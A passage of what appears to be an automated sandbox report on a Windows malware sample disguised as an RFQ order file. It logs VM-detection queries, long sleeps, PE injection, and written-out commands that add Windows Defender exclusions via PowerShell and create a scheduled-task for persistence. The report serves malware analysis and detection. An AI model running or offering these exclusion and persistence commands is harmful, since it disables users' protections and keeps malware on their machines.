Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exe WMI Queries: IWbemServices::ExecQuery - ROOT\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0 name: Identifier
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum name: 0
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4631
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2269
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4255
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2680
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5378
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3163
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exe Window / User API: threadDelayed 5367
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exe Window / User API: threadDelayed 4007
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exe Window / User API: foregroundWindowGot 639
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exe TID: 3396 Thread sleep time: -41772s >= -30000s
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exe TID: 6136 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7132 Thread sleep time: -16602069666338586s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3840 Thread sleep count: 4255 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6100 Thread sleep count: 2680 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5144 Thread sleep time: -26747778906878833s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6232 Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exe TID: 6292 Thread sleep time: -11068046444225724s >= -30000s
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exe Thread delayed: delay time: 41772
Source: powershell.exe, 00000008.00000003.389081037.00000000059A8000.00000004.00000001.sdmp, powershell.exe, 0000000A.00000003.394834074.00000000050CC000.00000004.00000001.sdmp Binary or memory string: Hyper-V
Source: #RFQ ORDER7678432213211.exe, 00000012.00000002.495135748.00000000070B0000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: #RFQ ORDER7678432213211.exeBinary or memory string: zE[TiU[]qET]m8Z\3QqeMU[]K<IgogJD|YJg4E[eyQ3[3Y5]DL6e3Q5\xDjfoUZd5<pfTU6\osp\SQ[]mopg|Y5XlY5Y843[wEjfoUZd5<pfTU6\osp\SQ[e|<pU843[wEjfoQ[YDL[]nopgyMKX3QZ]tM5W|Y5fY<YeDL[]nopgyMKX3QZ]tM5WzE[Ti4JD|YJ]s]6e|EIgmYpdl<nfoU[gz45eG<YeDPZeV]WerYHWsYZfGgmTWg4U3EzTqEqVWooe
Source: #RFQ ORDER7678432213211.exe, 00000012.00000002.483084169.000000000122D000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll)Zs
Source: #RFQ ORDER7678432213211.exe, 00000012.00000002.495135748.00000000070B0000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: #RFQ ORDER7678432213211.exe, 00000012.00000002.495135748.00000000070B0000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: powershell.exe, 00000008.00000003.389081037.00000000059A8000.00000004.00000001.sdmp, powershell.exe, 0000000A.00000003.394834074.00000000050CC000.00000004.00000001.sdmp Binary or memory string: l:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
Source: #RFQ ORDER7678432213211.exe, 00000012.00000002.495135748.00000000070B0000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion:

Adds a directory exclusion to Windows Defender
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\#RFQ ORDER7678432213211.exe'
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\XgPYsUfalKn.exe'
Injects a PE file into a foreign processes
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exe Memory written: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\#RFQ ORDER7678432213211.exe'
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\XgPYsUfalKn.exe'
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\XgPYsUfalKn' /XML 'C:\Users\user\AppData\Local\Temp\tmpFD92.tmp'
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exe Process created: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exe C:\Users\user\Desktop\#RFQ ORDER7678432213211.exe
Source: #RFQ ORDER7678432213211.exe, 00000012.00000002.489922128.00000000033F8000.00000004.00000001.sdmp Binary or memory string: Program Manager
Source: #RFQ ORDER7678432213211.exe, 00000012.00000002.483819077.0000000001A10000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: #RFQ ORDER7678432213211.exe, 00000012.00000002.483819077.0000000001A10000.00000002.00000001.sdmp Binary or memory string: Progman
Source: #RFQ ORDER7678432213211.exe, 00000012.00000002.483819077.0000000001A10000.00000002.00000001.sdmp Binary or memory string: Progmanlock
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exe Queries volume information: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exe VolumeInformation
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\#RFQ ORDER7678432213211.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
